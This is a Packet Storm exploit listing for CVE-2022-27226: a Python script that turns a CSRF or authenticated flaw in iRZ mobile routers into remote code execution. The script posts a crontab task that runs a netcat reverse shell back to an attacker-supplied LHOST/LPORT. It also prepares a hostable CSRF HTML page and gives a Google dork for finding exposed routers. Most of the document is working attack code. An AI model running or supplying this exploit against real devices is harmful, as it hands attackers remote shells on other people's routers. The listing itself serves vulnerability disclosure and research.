what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iRZ Mobile Router Cross Site Request Forgery / Remote Code Execution

iRZ Mobile Router Cross Site Request Forgery / Remote Code Execution
Posted Mar 22, 2022
Authored by Robert Willis, Stephen Chavez

iRZ mobile routers versions RU21, RU21w, RL21, RU41, and RL01 suffer from a cross site request forgery vulnerability that can enable remote code execution.

tags | exploit, remote, code execution, csrf
advisories | CVE-2022-27226
SHA-256 | 9f87d1b4dfcf65a7a815809793fabfafcaf1d56d194ef000382ae92167e751d7

iRZ Mobile Router Cross Site Request Forgery / Remote Code Execution

Change Mirror Download
# Exploit Title: iRZ Mobile Router - CSRF to RCE
# Google Dork: intitle:"iRZ Mobile Router"
# Date: 2022-03-18
# Exploit Author: Stephen Chavez & Robert Willis
# Vendor Homepage: https://en.irz.ru/
# Software Link: https://github.com/SakuraSamuraii/ez-iRZ
# Version: Routers through 2022-03-16
# Tested on: RU21, RU21w, RL21, RU41, RL01
# CVE : CVE-2022-27226

import os
import requests
import json
import subprocess

option = "0"


def main():
print("####################################################")
print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
print("####################################################")
print()
print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
print()
print("1. Post Authentication RCE (Needs Credentials)")
print("2. CSRF to RCE (No Credentials)")
print()
runit()


def runit():
option = input("Select an option: ")
if option == "1":
exploit1()
elif option == "2":
exploit2()
else:
print("You must select '1' or '2'. Exiting.")


def exploit1():
print("## Running Post Auth RCE exploit")
print()
print()
router_ip = input("## Enter the router ip to exploit: ")
router_port = int(
input("## Enter the victim router web page port (default is 80): ") or "80")

router_user = input("## Enter the username for the router login: ")
router_pass = input("## Enter the password for the router login: ")

LHOST = input("## Enter the LHOST for the router reverse shell: ")
LPORT = input("## Enter the LPORT for the router reverse shell: ")

router_url = f'http://{router_ip}:{router_port}'

nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'

input(nc1_str + "\n\nPress enter once you do")

send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)


def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):

intro = f'Sending the payload to {router_url}\n'
print(intro)
payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
f'{lhost_ip} {lhost_port} ' + \
'>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'

payload_json = json.loads(payload_str)

s = requests.Session()

s.auth = (router_user, router_pass)

s.headers.update(
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
s.headers.update({"X-Requested-With": "XMLHttpRequest"})
s.headers.update({"Origin": router_url})
s.headers.update({"Referer": router_url})

s.post(router_url + "/api/crontab", json=payload_json)

exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'

print(
"Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)
print("To fix TTY: type telnet 0.0.0.0 in the shell")


def exploit2():

print("## Running CSRF to RCE exploit")
print()
print()
router_ip = input("## Enter the router ip to exploit: ")
router_port = int(
input("## Enter the victim router web page port (default is 80): ") or "80")

LHOST = input("## Enter the LHOST for the router reverse shell: ")
LPORT = input("## Enter the LPORT for the router reverse shell: ")

load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)


def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):

file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"

if os.path.isfile(file_path):
with open(file_path) as poc_file:
original_poc_data_str = poc_file.read()

new_html = original_poc_data_str.replace("{router_ip}", router_ip)
new_html = new_html.replace(
"{router_port}", str(router_port))

lhost_split_arr = lhost_ip.split(".")

if len(lhost_split_arr) == 4:

new_html = new_html.replace(
"{lhost_ip_octect_1}", lhost_split_arr[0])

new_html = new_html.replace(
"{lhost_ip_octect_2}", lhost_split_arr[1])

new_html = new_html.replace(
"{lhost_ip_octect_3}", lhost_split_arr[2])
new_html = new_html.replace(
"{lhost_ip_octect_4}", lhost_split_arr[3])

new_html = new_html.replace(
"{lhost_port}", lhost_port)

new_file_path = os.path.dirname(
__file__) + os.sep + "poc.new.html"
try:
with open(new_file_path, 'w') as new_file:
new_file.write(new_html)

print()
print(
f'New file written to {new_file_path}. Host this file')
except FileNotFoundError:
print("You had an error writing to the file, doesn't exist.")
else:
print(f'{lhost_ip} is not a proper IPV4 address.')

else:
print(f'{file_path} not found')


main()


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close